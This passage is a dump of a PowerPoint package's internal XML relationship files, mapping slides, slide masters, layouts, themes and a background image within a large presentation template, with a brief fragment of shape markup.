Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide20.xml"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide19.xml"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide18.xml"/><Relationship Id="rId136" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId135" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId134" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId133" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide14.xml"/><Relationship Id="rId132" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide13.xml"/><Relationship Id="rId131" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide12.xml"/><Relationship Id="rId130" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide11.xml"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster12.xml"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide10.xml"/><Relationship Id="rId128" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide9.xml"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide8.xml"/><Relationship Id="rId126" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide7.xml"/><Relationship Id="rId125" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6.xml"/><Relationship Id="rId124" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide5.xml"/><Relationship Id="rId123" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide4.xml"/><Relationship Id="rId122" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3.xml"/><Relationship Id="rId121" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide2.xml"/><Relationship Id="rId120" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide1.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster11.xml"/><Relationship Id="rId119" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster118.xml"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster117.xml"/><Relationship Id="rId117" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster116.xml"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster115.xml"/><Relationship Id="rId115" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster114.xml"/><Relationship Id="rId114" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster113.xml"/><Relationship Id="rId113" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster112.xml"/><Relationship Id="rId112" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster111.xml"/><Relationship Id="rId111" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster110.xml"/><Relationship Id="rId110" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster109.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster10.xml"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster108.xml"/><Relationship Id="rId108" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster107.xml"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster106.xml"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster105.xml"/><Relationship Id="rId105" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster104.xml"/><Relationship Id="rId104" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster103.xml"/><Relationship Id="rId103" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster102.xml"/><Relationship Id="rId102" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster101.xml"/><Relationship Id="rId101" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster100.xml"/><Relationship Id="rId100" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="slideMasters/slideMaster99.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1001.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2.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3.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4.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5.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6.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7.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8.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09.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101.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1011.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2.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3.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4.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5.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6.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7.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8.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19.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster102.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1021.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2.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3.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4.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5.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6.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7.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8.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29.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster103.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1031.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2.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3.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4.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5.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6.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7.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8.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39.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster104.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1041.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2.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3.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4.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5.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6.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7.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8.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49.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster105.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1051.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2.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3.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4.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5.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6.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7.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8.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59.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster106.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1061.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2.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3.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4.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5.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6.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7.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8.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69.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster107.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1071.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2.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3.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4.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5.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6.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7.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8.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79.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster108.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1081.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2.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3.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4.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5.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6.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7.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8.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89.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster109.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1091.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2.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3.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4.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5.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6.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7.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8.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099.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00.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster110.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1101.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2.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3.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4.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5.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6.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7.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8.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09.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster111.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1111.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2.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3.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4.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5.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6.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7.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8.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19.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster112.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1121.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2.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3.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4.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5.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6.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7.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8.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29.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster113.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1131.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2.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3.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4.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5.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6.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7.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8.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39.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster114.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1141.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2.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3.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4.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5.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6.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7.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8.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49.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster115.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1151.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2.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3.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4.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5.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6.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7.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8.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59.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster116.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1161.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2.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3.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4.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5.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6.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7.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8.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69.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster117.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout1171.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2.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3.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4.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5.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6.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7.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8.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79.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster11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88.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89.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90.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91.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92.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7.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8.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29.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93.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3.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7.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8.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39.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94.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout941.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2.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3.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4.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5.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6.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7.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8.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49.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95.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout951.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2.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3.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4.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5.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6.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8.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59.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96.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout961.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2.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3.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4.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5.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6.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7.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8.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69.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97.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout971.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2.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3.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4.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5.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6.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7.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8.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79.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0.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster98.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout981.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2.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3.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4.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5.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6.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7.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8.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89.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99.xml"/></Relationships>
</file>

<file path=ppt/slideLayouts/_rels/slideLayout991.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2.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3.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4.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5.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6.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7.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8.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_rels/slideLayout999.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideMaster" Target="../slideMasters/slideMaster10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0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1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8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2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3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4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5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5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6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7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11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8801478" y="645017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9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99.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout98.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout97.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 Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout93.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout92.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme10.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout100.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout91.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster100.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout999.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout998.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout997.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout996.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout995.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout994.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout993.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout992.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme100.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1000.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout991.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster101.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1009.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1008.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1007.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1006.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1005.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1004.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1003.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1002.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme101.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1010.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1001.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster102.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1019.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1018.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1017.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1016.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1015.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1014.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1013.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1012.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme102.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1020.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1011.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster103.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1029.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1028.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1027.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1026.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1025.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1024.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1023.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1022.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme103.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1030.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1021.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster104.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1039.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1038.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1037.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1036.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1035.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1034.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1033.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1032.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme104.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1040.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1031.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster105.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1049.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1048.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1047.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1046.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1045.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1044.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1043.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1042.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme105.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1050.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1041.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster106.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1059.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1058.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1057.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1056.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1055.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1054.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1053.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1052.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme106.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1060.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1051.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster107.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1069.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1068.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1067.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1066.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1065.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1064.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1063.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1062.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" 